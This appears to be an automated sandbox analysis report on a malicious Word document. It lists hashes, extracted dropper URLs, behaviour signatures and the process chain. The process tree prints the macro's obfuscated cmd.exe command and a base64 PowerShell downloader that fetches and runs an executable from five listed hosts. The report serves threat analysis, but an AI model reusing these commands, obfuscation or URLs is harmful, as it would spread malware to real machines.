Analysis
-
max time kernel
19s -
max time network
20s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
08-11-2020 11:15
General
-
Target
8e04c42475bc3540925710dd1c71fad658b7cb19b6b2206fb59d0fea9b37cd2a.doc
-
Size
78KB
-
MD5
77fa28e31ec25d1d8d1e639018d9b52f
-
SHA1
a7d364424df2b19000b76dadd0856fe107ed9f80
-
SHA256
8e04c42475bc3540925710dd1c71fad658b7cb19b6b2206fb59d0fea9b37cd2a
-
SHA512
445574d75edc96c67fe10b4c0ee12c6867015793d7b1672577ace4ada0717715d5aa66fe4fe14e7c32a5c355baf065e4e62a829cf6ed767b0454f8c02f434f74
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://artwellness.net/QD1Rti
exe.dropper
http://arkanddove.com/t
exe.dropper
http://ingridkaslik.com/M355AhF
exe.dropper
http://softwarelibre.unipamplona.edu.co/limesurvey/upload/vJa
exe.dropper
http://rmubp.chphmu.de/4bP6ssQ4
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blacklisted process makes network request 5 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8e04c42475bc3540925710dd1c71fad658b7cb19b6b2206fb59d0fea9b37cd2a.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\Cmd.exeCmd /V:^ON/C"^se^t ^13=A^AC^AgA^AIA^AC^A^gAA^IA^ACAg^A^A^I^A^ACAg^A^AI^A^AC^Ag^AAI^A^AC^A^gAQf^A0^HA7B^A^aAM^GA^0BQY^A^M^G^A9Bw^O^A^sG^AhBQZA^I^HA^i^B^wO^AQF^A^pB^gR^AQC^Ag^A^Q^b^AUG^A^0^BQ^S^A^0C^Al^BwaA8^G^A^2Bg^bAkEA7AQK^AQF^ApBgR^A^QC^A^g^AAL^Ao^G^A^PB^gQA^QCA^o^AQZA^w^G^A^p^B^gR^A^QGA^h^Bw^bA^w^GAuB^wdA8G^A^E^Bg^L^A^g^F^AuB^Q^W^A^QCA7^BQeA^IHA0^B^weA^kCA^3BQ^W^AIHA^kA^A^I^A4^G^A^pB^AI^Ao^G^APB^g^Q^AQC^Ao^AAaA^MG^Ah^BQ^ZAIH^AvBg^Z^A^s^DAnA^Q^ZAg^H^A^l^BgL^AcC^Ar^AAc^Ac^HA^MBA^JAsCAn^A^A^X^AcC^Ar^A^wY^AkGAsB^gY^AUHA^wB^gOAY^HAu^B^QZ^AQCA9^A^AVA^k^G^A^G^BAJA^s^D^AnAQ^OAcDAn^A^AI^A0^DA^g^AAc^Ac^H^A^M^B^AJA^sDA^p^Aw^J^A^AE^An^AA^KA^Q^HApBA^b^AA^HATB^g^LAcC^A^0^A^Q^U^A^MH^A^z^B^gN^AAFAi^BAN^A8CAl^B^A^Z^A4CA^1^BQ^b^Ag^G^A^w^B^A^a^AMG^A^uAAc^A^I^GA^1BQbAIH^Av^Aw^LA^o^DAw^BA^d^A^QHA^oBA^Q^AE^GAKB^g^d^A^8C^Ak^BQ^YA^8GA^sB^Ac^A^U^H^AvAQ^e^AU^GA^2B^gcA^U^H^A^z^BQ^ZA0GA^pB^AbA8C^Av^Bw^YA^4C^A^1^BAZA^UG^A^u^AQYA^4^G^Av^BAbAA^HA^tBQY^A^AH^Ap^B^g^bAUHAuAQZA^IH^A^i^B^Qa^A^w^GAl^B^gc^AEG^A^3B^A^d^A^Y^G^Av^BwcA^8C^Av^Ag^O^A^AH^A0^B^A^d^AgGAA^B^gR^Ag^G^AB^B^QNA^U^D^AzA^Q^TA8C^A^t^B^w^b^AM^GA^uAwaA^kG^A^s^B^wcAE^G^ArBAZA^k^G^Ay^B^w^Z^A4^GApB^w^LA8CA^6AAcAQH^A^0^BAa^A^AEA^0^B^wLA^0GAvB^w^YA4CA^lBg^d^A^8^GA^kB^AZA4^G^Ah^B^w^a^AIH^AhBwL^A^8C^A^6^A^Ac^AQ^H^A^0B^Aa^A^A^E^A^pB^A^d^A^IFAx^A^ARA^E^FAv^AA^dA^UG^Au^BgLAMHAz^BQ^Z^A4GAsB^AbAUG^A3^B^Ad^A^I^HAh^Bw^LA8CA6A^AcA^QHA0BAa^AcCA9A^wdA^k^FA^yB^A^J^As^D^A^0BgbAU^G^Ap^B^A^bAME^Ai^B^QZ^AcFAu^AA^dAUGAOB^AI^AQ^H^AjB^QZ^A^o^GAiBw^bA0C^A^3B^QZA^4^GA9AAW^A4GA^Z^BA^J^ ^e^- l^l^ehsr^e^w^o^p&&for /^L %^p ^in (1^021^;-^1^;0)^d^o s^e^t a^z^J=!a^z^J!!^13:~%^p,1!&&i^f %^p ^l^eq ^0 c^al^l %a^z^J:^~-^1^022%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABZAG4AWAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAFkAdwA9ACcAaAB0AHQAcAA6AC8ALwBhAHIAdAB3AGUAbABsAG4AZQBzAHMALgBuAGUAdAAvAFEARAAxAFIAdABpAEAAaAB0AHQAcAA6AC8ALwBhAHIAawBhAG4AZABkAG8AdgBlAC4AYwBvAG0ALwB0AEAAaAB0AHQAcAA6AC8ALwBpAG4AZwByAGkAZABrAGEAcwBsAGkAawAuAGMAbwBtAC8ATQAzADUANQBBAGgARgBAAGgAdAB0AHAAOgAvAC8AcwBvAGYAdAB3AGEAcgBlAGwAaQBiAHIAZQAuAHUAbgBpAHAAYQBtAHAAbABvAG4AYQAuAGUAZAB1AC4AYwBvAC8AbABpAG0AZQBzAHUAcgB2AGUAeQAvAHUAcABsAG8AYQBkAC8AdgBKAGEAQABoAHQAdABwADoALwAvAHIAbQB1AGIAcAAuAGMAaABwAGgAbQB1AC4AZABlAC8ANABiAFAANgBzAHMAUQA0ACcALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABMAHcAcAAgAD0AIAAnADcAOQAnADsAJABGAGkAVAA9ACQAZQBuAHYAOgBwAHUAYgBsAGkAYwArACcAXAAnACsAJABMAHcAcAArACcALgBlAHgAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQgBPAGoAIABpAG4AIAAkAHIAWQB3ACkAewB0AHIAeQB7ACQAWQBuAFgALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAQgBPAGoALAAgACQARgBpAFQAKQA7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQARgBpAFQAOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AH0AfQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA3⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1116-5-0x0000000000000000-mapping.dmp
-
memory/1116-6-0x00007FFAE1F50000-0x00007FFAE293C000-memory.dmpFilesize
9.9MB
-
memory/1116-7-0x0000014DE30D0000-0x0000014DE30D1000-memory.dmpFilesize
4KB
-
memory/1116-8-0x0000014DE3280000-0x0000014DE3281000-memory.dmpFilesize
4KB
-
memory/3848-4-0x0000000000000000-mapping.dmp
-
memory/4760-0-0x0000018CB1810000-0x0000018CB1E47000-memory.dmpFilesize
6.2MB
-
memory/4760-1-0x0000018CBA0C7000-0x0000018CBA0CC000-memory.dmpFilesize
20KB
-
memory/4760-2-0x0000018CBA0C7000-0x0000018CBA0CC000-memory.dmpFilesize
20KB